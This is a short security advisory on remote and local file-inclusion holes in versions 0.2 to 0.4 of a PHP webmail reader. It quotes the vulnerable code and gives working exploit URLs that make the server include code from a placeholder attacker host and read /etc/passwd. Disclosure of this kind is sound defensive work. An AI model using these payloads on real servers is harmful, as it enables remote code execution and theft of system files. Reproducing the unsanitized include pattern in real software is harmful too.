Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems :Include file (local, remote)
Version: 0.2;0.3
File:
email.php3 (version 0.2) ; email.php (version 0.3)
PHP Code:
[…]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[…]
Exploit :
http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php
–>
include http://[attacker]/code.php on remote server
include local file
–>
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd
Versions: 0.4
File:
webmail/lib/emailreader_execute_on_each_page.inc.php
PHP Code:
[…]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[…]
Exploit :
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
–>
include http://[attacker]/code.php on remote server
include local file
–>
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd
–
(if registers_global=ON)
–
[email protected]